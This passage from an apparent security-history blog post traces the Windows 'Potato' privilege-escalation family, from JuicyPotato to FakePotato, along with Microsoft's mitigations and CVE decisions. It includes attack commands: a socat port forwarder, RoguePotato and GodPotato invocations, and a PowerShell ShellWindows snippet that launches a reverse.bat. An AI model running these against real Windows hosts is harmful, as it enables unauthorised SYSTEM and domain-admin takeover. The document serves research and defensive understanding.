&lt;p&gt;JuicyPotato turned RottenPotato into a search engine. The README ships a per-Windows-version class identifier matrix: each row a Windows release, each column a CLSID that activates under SYSTEM context and implements the &lt;code&gt;IMarshal&lt;/code&gt; interface [@ohpe-juicy]. The tool accepts a tunable listener port (replacing the hard-coded 6666), a tunable process-creation mode (&lt;code&gt;CreateProcessWithToken&lt;/code&gt; for &lt;code&gt;SeImpersonate&lt;/code&gt; holders, &lt;code&gt;CreateProcessAsUser&lt;/code&gt; for &lt;code&gt;SeAssignPrimaryToken&lt;/code&gt; holders, or both), and a TEST mode for class-identifier discovery [@ohpe-juicy].&lt;/p&gt;

Microsoft does not freeze the set of registered Distributed COM class identifiers across Windows builds. Default COM-server registrations change between releases as components are added, removed, or refactored. A class identifier that activates under SYSTEM on Windows 10 1709 may not exist on Server 2019. JuicyPotato&apos;s CLSID matrix is therefore not a static lookup table -- it is the precomputed result of an empirical per-build search [@ohpe-juicy]. Every red-team handbook published between 2018 and 2020 references this matrix; subsequent variants (RoguePotato, JuicyPotatoNG) inherit and update it.

flowchart TD
    A[Enumerate registered DCOM CLSIDs on target build] --&amp;gt; B{&quot;For each CLSID&quot;}
    B --&amp;gt; C[Attempt CoGetInstanceFromIStorage with marshalled IStorage]
    C --&amp;gt; D{&quot;Activation reaches attacker listener?&quot;}
    D --&amp;gt;|No| B
    D --&amp;gt;|Yes| E{&quot;Callback authenticates as SYSTEM?&quot;}
    E --&amp;gt;|No| B
    E --&amp;gt;|Yes| F[Log CLSID into per-OS matrix]
    F --&amp;gt; B
    B --&amp;gt; G[Output: working CLSID for this Windows build]
&lt;p&gt;The Potato class was now universal. From mid-2018 through 2019 it was the default tool in every red-team handbook, every Metasploit-adjacent post-exploitation cheat-sheet, and every penetration-testing certification&apos;s lab. Microsoft had noticed.&lt;/p&gt;
&lt;h2&gt;6. The Mitigation Arms Race, 2020-2024&lt;/h2&gt;
&lt;p&gt;Every subsection below is the same shape: Microsoft ships a mitigation, researchers find a counter-move, MSRC produces an artifact (a CVE, a &quot;Won&apos;t Fix&quot; decision, or silence), and the architectural reading gets one more empirical confirmation.&lt;/p&gt;
&lt;h3&gt;6.1 The first Distributed COM mitigation, 2019-2020&lt;/h3&gt;
&lt;p&gt;In late 2018, Windows 10 1809 and Server 2019 began shipping a change to RPCSS. JuicyPotato stopped working. Researchers who reverse-engineered the change discovered that the OXID resolver address on the local Distributed COM activation path was now hard-coded to &lt;code&gt;127.0.0.1:135&lt;/code&gt;. The marshalled &lt;code&gt;IStorage&lt;/code&gt; callback could no longer be redirected to an arbitrary loopback port. Forshaw described it bluntly three years later:&lt;/p&gt;

Being able to redirect the OXID resolver RPC connection locally to a different TCP port was not by design and Microsoft eventually fixed this in Windows 10 1809/Server 2019. -- James Forshaw, October 2021 [@forshaw-pz-2021]
&lt;p&gt;No CVE was assigned. The change shipped silently as part of the regular Patch Tuesday cycle [@forshaw-pz-2021]. Pierini and Cocomazzi tested it on their own workloads and confirmed the failure mode publicly in October 2018: &quot;Recently I downloaded the new Windows server 2019 and upgraded my Win10 box to 1809 ... the juicy/rotten exploit ... did not work on both OS&quot; [@decoder-no-more-rotten].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The 2019-2020 OXID-resolver change is the first Microsoft response to the Potato family. It does not declare Distributed COM activation a security boundary. It narrows the resolver port to 135 and leaves the underlying primitive (coerce SYSTEM context via OXID resolver, then impersonate the resulting token) intact. The mitigation defines exactly one specific bypass; researchers had to discover that themselves [@forshaw-pz-2021; @decoder-no-more-rotten].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;6.2 RoguePotato (Cocomazzi + Pierini, May 2020)&lt;/h3&gt;
&lt;p&gt;On May 10, 2020, Antonio Cocomazzi published the RoguePotato repository on GitHub [@antonio-rogue]. The disclosure post appeared the next day, May 11. The README banner is &quot;RoguePotato @splinter_code &amp;amp; @decoder_it&quot; -- the same Pierini-and-Cocomazzi team that goes on to author RemotePotato0, JuicyPotatoNG, LocalPotato, and SilverPotato [@antonio-rogue].&lt;/p&gt;
&lt;p&gt;The counter-move accepts the hard-coded port-135 constraint and works around it. RoguePotato is two pieces. On an attacker-controlled remote host, run a port forwarder that listens on TCP 135 and redirects to a chosen attacker port. On the target, run &lt;code&gt;RoguePotato.exe&lt;/code&gt; pointing the OXID resolver at the remote forwarder. RPCSS dutifully sends the resolution request to the remote host on port 135 (since Microsoft hard-coded the &lt;em&gt;port&lt;/em&gt;, not the &lt;em&gt;host&lt;/em&gt;); the forwarder bounces the traffic back to the target on the attacker-chosen port; RoguePotato impersonates the OXID resolver and steers the activation back to a SYSTEM-context COM server [@antonio-rogue]. Standard NTLM relay and named-pipe impersonation finish the job.&lt;/p&gt;

flowchart LR
    A[RoguePotato.exe on target] --&amp;gt; B[RPCSS sends OXID resolution to remote-host port 135]
    B --&amp;gt; C[Remote port forwarder on attacker VPS]
    C --&amp;gt; D[Forward to target on attacker-chosen port]
    D --&amp;gt; E[Fake OXID resolver inside RoguePotato]
    E --&amp;gt; F[Steer activation to SYSTEM-context COM server]
    F --&amp;gt; G[Named-pipe impersonation, CreateProcessWithToken, SYSTEM shell]
&lt;p&gt;{&lt;code&gt;// Step 1 -- on an attacker-controlled remote host (any internet-reachable VPS): const forwarder = &quot;socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999&quot;; // Step 2 -- on the target with SeImpersonatePrivilege: const exploit = &apos;RoguePotato.exe -r 10.0.0.3 -e &quot;C:\\\\windows\\\\system32\\\\cmd.exe&quot; -l 9999&apos;; console.log(&quot;Remote forwarder:&quot;, forwarder); console.log(&quot;Target exploit  :&quot;, exploit); console.log(&quot;Expected output : nt authority\\\\system&quot;);&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;RoguePotato proved that the mitigation Microsoft chose did not break the underlying primitive. It only forced the attack to phone home. Two failure modes followed: in egress-filtered networks where outbound TCP 135 is blocked, the technique cannot run, and the remote forwarder is operationally noisy. Researchers needed a workaround that lived entirely on the target.&lt;/p&gt;
&lt;h3&gt;6.3 PrintSpoofer (Clément Labro, early May 2020)&lt;/h3&gt;
&lt;p&gt;Around the same time as RoguePotato, in early May 2020 (GitHub repository &lt;code&gt;itm4n/PrintSpoofer&lt;/code&gt; created April 28, 2020; blog post first archived in the Wayback Machine on May 3, 2020), Clément Labro -- writing as &lt;code&gt;itm4n&lt;/code&gt; -- published &quot;PrintSpoofer -- Abusing Impersonation Privileges on Windows 10 and Server 2019&quot; [@itm4n-printspoofer]. The mechanism uses no Distributed COM at all.&lt;/p&gt;
&lt;p&gt;The Print Spooler service exposes an RPC call, &lt;code&gt;RpcRemoteFindFirstPrinterChangeNotificationEx&lt;/code&gt;, that accepts a UNC path; the Spooler -- running as SYSTEM -- connects to that path to deliver printer-change notifications. Point the path at an attacker-owned named pipe; the Spooler connects; call &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;; done [@itm4n-printspoofer]. Labro articulated the family&apos;s thesis statement in the post, attributing it to Decoder:&lt;/p&gt;

If you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM. -- attributed to Andrea Pierini (@decoder_it), quoted by Clément Labro in the PrintSpoofer writeup, May 2020 [@itm4n-printspoofer]

sequenceDiagram
    participant Atk as PrintSpoofer (SeImpersonate holder)
    participant Pipe as Attacker-owned named pipe
    participant Spooler as Print Spooler (SYSTEM)
    Atk-&amp;gt;&amp;gt;Pipe: Create named pipe and start accept loop
    Atk-&amp;gt;&amp;gt;Spooler: RpcRemoteFindFirstPrinterChangeNotificationEx with attacker UNC
    Spooler-&amp;gt;&amp;gt;Pipe: Connect to UNC path under SYSTEM context
    Pipe-&amp;gt;&amp;gt;Atk: ImpersonateNamedPipeClient on server thread
    Atk-&amp;gt;&amp;gt;Atk: CreateProcessWithToken spawns SYSTEM shell
&lt;p&gt;This is the moment the architectural reading clicks. The family is &lt;em&gt;not&lt;/em&gt; about Distributed COM activation. Closing DCOM would not close the family. The next variant would use Spooler RPC, the one after that would use the Encrypting File System RPC, and the one after that would use Microsoft Distributed Transaction Coordinator RPC. Forshaw&apos;s contemporaneous April 2020 tiraniddo.dev post on shared logon sessions makes the same architectural point from a different angle [@forshaw-tiraniddo-2020].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The Potato family is about the primitive, not the vehicle. &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; plus &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; plus any SYSTEM-context Windows service with a callback-style API equals SYSTEM. Closing one vehicle (Distributed COM activation) leaves every other vehicle (Spooler RPC, EFS RPC, the next service that gets a callback interface) wide open [@itm4n-printspoofer; @forshaw-tiraniddo-2020].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;6.4 RemotePotato0 and the &quot;Won&apos;t Fix&quot;&lt;/h3&gt;
&lt;p&gt;In April 2021, Cocomazzi and Pierini pushed the technique across the network in a SentinelLabs post titled &quot;Relaying Potatoes: DCE/RPC NTLM Relay EoP&quot; [@sentinellabs-relaying]. The repository tagline names the outcome bluntly: &quot;Just another &apos;Won&apos;t Fix&apos; Windows Privilege Escalation from User to Domain Admin&quot; [@antonio-remote].&lt;/p&gt;
&lt;p&gt;The mechanism is cross-session NTLM relay over Distributed COM and RPC. An unprivileged local user triggers the Distributed COM activation service to make another user logged on the same machine (typically an administrator in an interactive RDP session) authenticate via NTLM. The captured NTLM exchange is then cross-protocol relayed (RPC to LDAP, with a port forwarder bridging the gap) to a domain controller with LDAP signing disabled. The attacker writes their own account into a privileged group or registers resource-based constrained delegation, and the engagement is over [@sentinellabs-relaying].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response is the most quoted sentence in the family&apos;s history:&lt;/p&gt;

The current status of this vulnerability is &apos;won&apos;t fix&apos; ... Although Microsoft considers the vulnerability an important privilege escalation, it has been classified as &apos;Won&apos;t Fix&apos;. -- SentinelLabs disclosure of RemotePotato0, April 2021 [@sentinellabs-relaying]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; RemotePotato0 was a fully working exploit chain that promoted any local low-privilege user to Domain Admin. Microsoft was given the disclosure, replicated the technique, and declined to issue a CVE. This is the moment the architectural reading stops being a researcher narrative and becomes a documented MSRC decision [@sentinellabs-relaying]. Microsoft eventually shipped a partial mitigation in October 2022 that broke the RPC-to-LDAP scenario specifically, but the underlying primitive survives in adjacent variants [@antonio-remote].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;6.5 The CVE-2021-26414 Distributed COM hardening rollout&lt;/h3&gt;
&lt;p&gt;Two months after the RemotePotato0 disclosure, Microsoft began the only DCOM-side hardening it would ship under a CVE. KB5004442 documents a three-phase rollout, quoted verbatim from the article: &quot;The first phase of DCOM updates was released on June 8, 2021. In that update, DCOM hardening was disabled by default. ... The second phase of DCOM updates was released on June 14, 2022. ... The final phase of DCOM updates will be released in March 2023. It will keep the DCOM hardening enabled and remove the ability to disable it&quot; [@ms-kb5004442].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Phase&lt;/th&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Behaviour&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Phase 1&lt;/td&gt;
&lt;td&gt;June 8, 2021&lt;/td&gt;
&lt;td&gt;DCOM hardening shipped, &lt;em&gt;disabled by default&lt;/em&gt;. Administrators may opt in via registry.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Phase 2&lt;/td&gt;
&lt;td&gt;June 14, 2022&lt;/td&gt;
&lt;td&gt;Hardening &lt;em&gt;enabled by default&lt;/em&gt;. Registry opt-out still available.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Phase 3&lt;/td&gt;
&lt;td&gt;March 14, 2023&lt;/td&gt;
&lt;td&gt;Hardening &lt;em&gt;enforced with no opt-out&lt;/em&gt;. The &lt;code&gt;RPC_C_AUTHN_LEVEL_PKT_INTEGRITY&lt;/code&gt; minimum is mandatory.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The RPC authentication-level constant that requires every packet of an RPC exchange to be signed for integrity (level 5 of 6). CVE-2021-26414 raises the *minimum* DCOM activation authentication level to this constant, rejecting legacy Distributed COM clients that activate at lower levels. The full rejection appears in Windows Event ID 10036 as &quot;The server-side authentication level policy does not allow the user %1\\%2 SID (%3) from address %4 to activate DCOM server. Please raise the activation authentication level at least to RPC_C_AUTHN_LEVEL_PKT_INTEGRITY in client application&quot; [@ms-kb5004442].
&lt;p&gt;The hardening raised the bar for legacy Distributed COM client authentication. It did not declare Distributed COM activation a security boundary [@ms-kb5004442; @ms-techcommunity-dcom]. The &quot;Manage changes&quot; framing in the KB title is deliberate: this is a compatibility migration with telemetry events (10036 server-side, 10037 and 10038 client-side) so enterprises can find legacy clients before the final cut [@ms-kb5004442].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Distributed COM is everywhere in Windows. Removing the ability to activate at a lower authentication level breaks legacy Distributed COM applications that have not been updated since at least 2014. Microsoft&apos;s 21-month rollout window between Phase 1 (June 2021) and Phase 3 (March 2023) was a compatibility migration -- the telemetry events let enterprise IT find and fix the legacy clients before the final cut [@ms-kb5004442; @ms-techcommunity-dcom]. The hardening is the most aggressive Distributed COM mitigation Microsoft has ever shipped, and even so it does not declare Distributed COM activation a security boundary.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Researchers had 21 months to find a way around it. They took 18.&lt;/p&gt;
&lt;h3&gt;6.6 JuicyPotatoNG (Pierini + Cocomazzi, September 21, 2022)&lt;/h3&gt;
&lt;p&gt;Pierini and Cocomazzi returned on September 21, 2022, with JuicyPotatoNG -- the last pre-Phase-3 Distributed COM activation variant [@decoder-juicyng]. The blog post is titled &quot;Giving JuicyPotato a second chance: JuicyPotatoNG&quot; and walks through three counter-moves combined into a single binary [@decoder-juicyng; @antonio-juicyng].&lt;/p&gt;
&lt;p&gt;First, the tool embeds Forshaw&apos;s October 2021 local-OXID trick. Forshaw had shown that an OXID resolution request could be answered by a local Distributed COM server on a randomly selected port, dropping the need for an external forwarder [@forshaw-pz-2021]. JuicyPotatoNG ships that trick as a default. Second, it falls back to a tight set of usable class identifiers; the default is &lt;code&gt;{854A20FB-2D44-457D-992F-EF13785D2B51}&lt;/code&gt;, the PrintNotify class [@antonio-juicyng]. Third, it calls &lt;code&gt;LogonUser&lt;/code&gt; with &lt;code&gt;LOGON32_LOGON_NEW_CREDENTIALS&lt;/code&gt; to sidestep the INTERACTIVE-group restriction that constrained earlier post-RoguePotato attempts [@decoder-juicyng].&lt;/p&gt;
&lt;p&gt;The cross-pollination is worth marking. Forshaw&apos;s October 2021 Project Zero post on relaying Distributed COM authentication described the local-OXID trick as a research result [@forshaw-pz-2021]. Pierini and Cocomazzi picked it up eleven months later and shipped it as the default mode of JuicyPotatoNG [@decoder-juicyng]. SilverPotato (April 2024) and the Compass Security follow-on (September 2024) cite the same trick [@compass-three-headed]. Forshaw&apos;s blog has been the unofficial reference implementation for the lineage&apos;s offensive primitives for half its lifetime.&lt;/p&gt;
&lt;p&gt;JuicyPotatoNG also implements a Security Support Provider Interface (SSPI) hook on &lt;code&gt;AcceptSecurityContext&lt;/code&gt; to capture the SYSTEM token without requiring &lt;code&gt;RpcImpersonateClient&lt;/code&gt;. The effect is to make the tool work for both &lt;code&gt;SeImpersonate&lt;/code&gt; &lt;em&gt;and&lt;/em&gt; &lt;code&gt;SeAssignPrimaryToken&lt;/code&gt; holders [@decoder-juicyng]. The result is a clean, single-binary, no-external-infrastructure local-DCOM-activation exploit -- which is the version that worked between Phase 2 (June 14, 2022, enabled by default) and Phase 3 (March 14, 2023, enforced with no opt-out) of the CVE-2021-26414 rollout [@ms-kb5004442].&lt;/p&gt;
&lt;p&gt;The next variant would need to survive Phase 3.&lt;/p&gt;
&lt;h3&gt;6.7 GodPotato (BeichenDream, December 23, 2022)&lt;/h3&gt;
&lt;p&gt;Three months after JuicyPotatoNG, on December 23, 2022, the Chinese-speaking researcher BeichenDream published GodPotato to GitHub [@beichendream-god]. The README is bilingual English and Chinese, and it opens with a precise summary of where the variant fits in the lineage:&lt;/p&gt;

Based on the history of Potato privilege escalation for 6 years, from the beginning of RottenPotato to the end of JuicyPotatoNG, I discovered a new technology by researching DCOM, which enables privilege escalation in Windows 2012 - Windows 2022 ... There are some defects in rpcss when dealing with oxid, and rpcss is a service that must be opened by the system, so it can run on almost any Windows OS, I named it GodPotato. -- BeichenDream, GodPotato README, December 2022 [@beichendream-god]
&lt;p&gt;The mechanism manipulates the OXID-handling flow &lt;em&gt;inside&lt;/em&gt; RPCSS so the activated Distributed COM server&apos;s authentication callback returns to a tool-controlled endpoint &lt;em&gt;without&lt;/em&gt; requiring the OXID resolver to be redirected. Because the redirect itself is what the CVE-2021-26414 hardening rejects, GodPotato sidesteps the hardening entirely [@beichendream-god]. RPCSS is a mandatory Windows service -- it cannot be disabled without breaking the operating system -- so the technique works on every supported Windows release as of disclosure.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;// On a target host where the calling account holds SeImpersonatePrivilege // (default for every IIS app-pool identity, MSSQL service account, BITS account, etc.) const command = &apos;GodPotato -cmd &quot;cmd /c whoami&quot;&apos;; console.log(&quot;Run:&quot;, command); console.log(&quot;Expected output: nt authority\\\\system&quot;); console.log(&quot;Working OS coverage: Windows 8 through Windows 11; Server 2012 through Server 2025&quot;); console.log(&quot;Underlying primitive: RPCSS OXID-handling defect, no external infra, single binary&quot;);&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;Microsoft has not assigned a CVE to the underlying RPCSS defect [@beichendream-god; @compass-three-headed].Apache 2.0 licensing matters here: red-team operators routinely recompile GodPotato from source to bypass binary-hash signatures, and the permissive license makes redistribution unproblematic [@beichendream-god]. The pattern is consistent with the servicing-criteria reading. GodPotato is in May 2026 the practitioner default on every in-support Windows release: single binary, no external infrastructure, no separate OXID resolver, Apache-2.0-licensed and freely re-buildable when EDR vendors signature the public binary [@beichendream-god].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; GodPotato survives every Microsoft mitigation because Microsoft has not declared the underlying primitive a security boundary. Three named hardening waves (the 2019-2020 OXID-resolver change, the three-phase CVE-2021-26414 rollout from June 2021 to March 2023, and the per-variant CVE patches in 2023 and 2024) leave GodPotato working on Server 2025 and Windows 11 24H2 as of this writing [@beichendream-god; @ms-kb5004442; @compass-three-headed].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;6.8 LocalPotato and CVE-2023-21746&lt;/h3&gt;
&lt;p&gt;Three weeks after GodPotato landed, Microsoft assigned the first-ever CVE in the local Potato lineage. The variant was LocalPotato, the CVE was CVE-2023-21746, and the patch shipped in the January 2023 Patch Tuesday [@nvd-cve-2023-21746; @msrc-cve-2023-21746]. The Decoder writeup, published February 13, 2023, walks through the timeline:&lt;/p&gt;

&quot;We reported our findings to the Microsoft Security Response Center (MSRC) on September 9, 2022, and it was resolved with the release of the January 2023 patch Tuesday and assigned the CVE number CVE-2023-21746.&quot; -- Andrea Pierini, &quot;LocalPotato&quot; writeup, February 2023 [@decoder-localpotato]
&lt;p&gt;LocalPotato is not a Distributed COM activation Potato. It attacks the local NTLM authentication protocol itself. During a local NTLM exchange, the Type 2 (Challenge) message carries a &quot;Reserved&quot; field that, in the local-NTLM case, encodes the upper bytes of the local server context handle the client should associate with. By racing two simultaneous local NTLM authentications -- one privileged client to attacker server, one attacker client to a real local server -- and swapping the Reserved fields in the two Type 2 messages, LSASS binds the privileged identity to the attacker&apos;s low-privilege context [@decoder-localpotato; @localpotato-com]. The result is an arbitrary file-read and file-write primitive that chains cleanly to SYSTEM.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Pierini and Cocomazzi had been pushing on the architectural carve-out for seven years before they got a CVE. The boundary that made the difference: LocalPotato attacks the local user-to-local-user NTLM authentication context, which &lt;em&gt;is&lt;/em&gt; on the servicing-criteria boundary list. The underlying &lt;code&gt;SeImpersonate&lt;/code&gt;-to-SYSTEM primitive is not. Microsoft will service the parts of the protocol that are inside the boundary; it will not service the parts that are outside [@decoder-localpotato; @msrc-servicing-criteria].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The LocalPotato writeup credits Elad Shamir for the original hint that started the research [@decoder-localpotato]. The dedicated companion site &lt;code&gt;localpotato.com&lt;/code&gt; carries the canonical title &quot;LocalPotato -- When swapping the context leads you to SYSTEM&quot; and links the CVE [@localpotato-com].&lt;/p&gt;
&lt;h3&gt;6.9 SilverPotato (Pierini + Cocomazzi, April 24, 2024)&lt;/h3&gt;
&lt;p&gt;A year later, on April 24, 2024, Pierini and Cocomazzi extended the cross-session Distributed COM activation primitive that RemotePotato0 had pioneered into a fully practical &lt;em&gt;domain&lt;/em&gt; attack. The blog post title is &quot;Hello, I&apos;m your domain admin and I want to authenticate against you&quot; [@decoder-silverpotato]. The Troopers 24 abstract refers to the technique by its other name, ADCSCoercePotato [@troopers24; @decoder-adcs-coerce-repo]; both names refer to the same primitive.&lt;/p&gt;
&lt;p&gt;The mechanism: members of the &lt;strong&gt;Distributed COM Users&lt;/strong&gt; or &lt;strong&gt;Performance Log Users&lt;/strong&gt; built-in groups can remotely trigger an NTLM authentication from any user currently logged on the target server -- including a Domain Administrator on a Domain Controller -- and relay it. The specific vehicle is the &lt;code&gt;sppui&lt;/code&gt; Distributed COM application (class identifier &lt;code&gt;F87B28F1-DA9A-4F35-8EC0-800EFCF26B83&lt;/code&gt;, &quot;SPPUIObjectInteractive Class&quot;, hosted in &lt;code&gt;slui.exe&lt;/code&gt;), which runs under the Interactive User identity [@decoder-silverpotato]. Pierini&apos;s wording in the post is unsparing:&lt;/p&gt;

&quot;Members of Distributed COM Users or Performance Log Users Groups can trigger from remote and relay the authentication of users connected on the target server, including Domain Controllers.&quot; -- Andrea Pierini, &quot;SilverPotato&quot; writeup, April 2024 [@decoder-silverpotato]
&lt;p&gt;The captured authentication is relayed via &lt;code&gt;ntlmrelayx&lt;/code&gt; to &lt;a href=&quot;https://paragmali.com/blog/certified-pre-owned-ad-cs-and-active-directorys-second-trust/&quot; rel=&quot;noopener&quot;&gt;AD CS Web Enrollment&lt;/a&gt; or LDAP, then chained with &lt;code&gt;ForgeCert&lt;/code&gt; and &lt;code&gt;Rubeus&lt;/code&gt; into a full Domain Admin Kerberos TGT [@decoder-silverpotato]. The Compass Security follow-on from September 2024 extends the chain further by modifying the KrbRelay project to make it remote and cross-session capable: &quot;I modified the KrbRelay project to make it remote and cross-session capable, because Andrea did not release his PoC code ... DCOM hardening only allows relay to HTTP or unprotected LDAP&quot; [@compass-three-headed]. Tianze Ding&apos;s Black Hat Asia 2024 talk on &quot;CertifiedDCOM&quot; landed in the same window [@blackhat-asia-2024]. Pierini&apos;s February 2024 post on the ADCS server side of the same surface foreshadowed the chain a few weeks earlier [@decoder-adcs-server].&lt;/p&gt;

flowchart LR
    A[Member of Distributed COM Users on target DC] --&amp;gt; B[Cross-session DCOM activation against sppui CLSID]
    B --&amp;gt; C[Logged-on Domain Admin session authenticates via NTLM]
    C --&amp;gt; D[ntlmrelayx forwards NTLM to AD CS Web Enrollment]
    D --&amp;gt; E[Computer-template certificate issued]
    E --&amp;gt; F[ForgeCert and Rubeus mint Domain Admin Kerberos TGT]
    F --&amp;gt; G[Domain compromise]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Troopers 24 abstract describes SilverPotato as &quot;still in review by MSRC&quot; as of June 2024 [@troopers24]. The Compass Security follow-on demonstrates a working end-to-end chain four months later [@compass-three-headed]. The default Distributed COM group memberships on Domain Controllers that grant the activation rights SilverPotato weaponises have not changed in any shipping Windows release as of May 2026. No CVE has been assigned [@decoder-silverpotato; @troopers24].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;6.10 FakePotato and CVE-2024-38100&lt;/h3&gt;
&lt;p&gt;Four months after SilverPotato, on August 2, 2024, Pierini published the most recent named variant. He called it FakePotato, and he was up front about the name:&lt;/p&gt;

&quot;You might be wondering why I called it the &apos;Fake&apos; Potato. Initially, I thought it could be exploited using the same techniques as the *Potato families, but it turned out to be different and much simpler in this case.&quot; -- Andrea Pierini, &quot;The Fake Potato&quot; writeup, August 2024 [@decoder-fakepotato]
&lt;p&gt;FakePotato abuses the &lt;strong&gt;ShellWindows&lt;/strong&gt; Distributed COM application (AppID &lt;code&gt;{9BA05972-F6A8-11CF-A442-00A0C90A8F39}&lt;/code&gt;), hosted in &lt;code&gt;explorer.exe&lt;/code&gt; and registered to run under the Interactive User identity. Cross-session activation via &lt;code&gt;BindToMoniker(&quot;session:N!new:&amp;lt;CLSID&amp;gt;&quot;)&lt;/code&gt; invokes &lt;code&gt;ShellExecute&lt;/code&gt; in the target session. There is no NTLM relay, no token impersonation, no &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; requirement -- any Authenticated User suffices because &lt;code&gt;explorer.exe&lt;/code&gt; in High Integrity Level (UAC-disabled administrator) granted the Authenticated Users group execute permission via the DCOM Access Security ACL [@decoder-fakepotato].&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;$obj = [System.Runtime.InteropServices.Marshal]::BindToMoniker(&quot;session:2!new:9BA05972-F6A8-11CF-A442-00A0C90A8F39&quot;) $p = $obj.item(0).document.application $p.ShellExecute(&quot;c:\\temp\\reverse.bat&quot;, &quot;&quot;, &quot;c:\\windows&quot;, $null, 0)&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;Microsoft assigned CVE-2024-38100 and shipped the patch in the July 2024 Patch Tuesday cumulative updates on July 9, 2024 (KB5040434 for Windows 10 1607 / Windows Server 2016; equivalent KBs for Windows 11, Server 2019, Server 2022, and Server 2025) -- four weeks before the public disclosure [@decoder-fakepotato; @nvd-cve-2024-38100; @msrc-cve-2024-38100]. The patch corrects the &lt;code&gt;explorer.exe&lt;/code&gt; ACL in High Integrity Level contexts so the Authenticated Users permission required for activation is no longer granted. The underlying cross-session Distributed COM activation primitive that SilverPotato and FakePotato share is untouched [@decoder-silverpotato; @decoder-fakepotato].&lt;/p&gt;
&lt;p&gt;FakePotato is not, in the relay sense, a Potato at all. It is a misconfiguration of the &lt;code&gt;ShellWindows&lt;/code&gt; Distributed COM application&apos;s permissions in High Integrity Level contexts [@decoder-fakepotato]. Pierini&apos;s &quot;Fake&quot; framing acknowledges the divergence from the NTLM-reflection pattern that defined the family from RottenPotato through GodPotato. The naming choice is itself a small piece of taxonomy: not every member of the family is a token-relay exploit, even if every member exploits the same architectural carve-out.&lt;/p&gt;
&lt;p&gt;After nearly a decade of patching specific vehicles and refusing to declare the underlying primitive a boundary, Microsoft&apos;s pattern is hard to miss.&lt;/p&gt;
&lt;h2&gt;7. Eleven Variants at a Glance&lt;/h2&gt;
&lt;p&gt;Nine years of named-variant disclosures, eleven named variants, one architectural argument. The table below is sourced cell by cell from the preceding sections.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Variant&lt;/th&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Authors&lt;/th&gt;
&lt;th&gt;Coercion vehicle&lt;/th&gt;
&lt;th&gt;Mitigation it bypassed&lt;/th&gt;
&lt;th&gt;Microsoft response&lt;/th&gt;
&lt;th&gt;Still works in 2026?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;HotPotato [@foxglove-hotpotato]&lt;/td&gt;
&lt;td&gt;Jan 16, 2016&lt;/td&gt;
&lt;td&gt;Stephen Breen&lt;/td&gt;
&lt;td&gt;NBNS spoof + WPAD + HTTP-to-SMB relay&lt;/td&gt;
&lt;td&gt;MS08-068 same-protocol-only fix&lt;/td&gt;
&lt;td&gt;None named; EPA/SMB hardening eventually closed the vehicle&lt;/td&gt;
&lt;td&gt;Only on pre-1607 builds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RottenPotato [@foxglove-rottenpotato]&lt;/td&gt;
&lt;td&gt;Sep 23, 2016&lt;/td&gt;
&lt;td&gt;Stephen Breen + Chris Mallz&lt;/td&gt;
&lt;td&gt;DCOM activation via BITS CLSID on 127.0.0.1:6666&lt;/td&gt;
&lt;td&gt;(none yet)&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Only pre-1809 builds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RottenPotatoNG [@breenmachine-rottenng]&lt;/td&gt;
&lt;td&gt;Dec 29, 2017&lt;/td&gt;
&lt;td&gt;breenmachine&lt;/td&gt;
&lt;td&gt;Same as RottenPotato (C++ port; no Metasploit)&lt;/td&gt;
&lt;td&gt;(none yet)&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Only pre-1809 builds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;JuicyPotato [@ohpe-juicy]&lt;/td&gt;
&lt;td&gt;Jul 27, 2018&lt;/td&gt;
&lt;td&gt;Andrea Pierini + Giuseppe Trotta&lt;/td&gt;
&lt;td&gt;Generalised DCOM activation; CLSID matrix&lt;/td&gt;
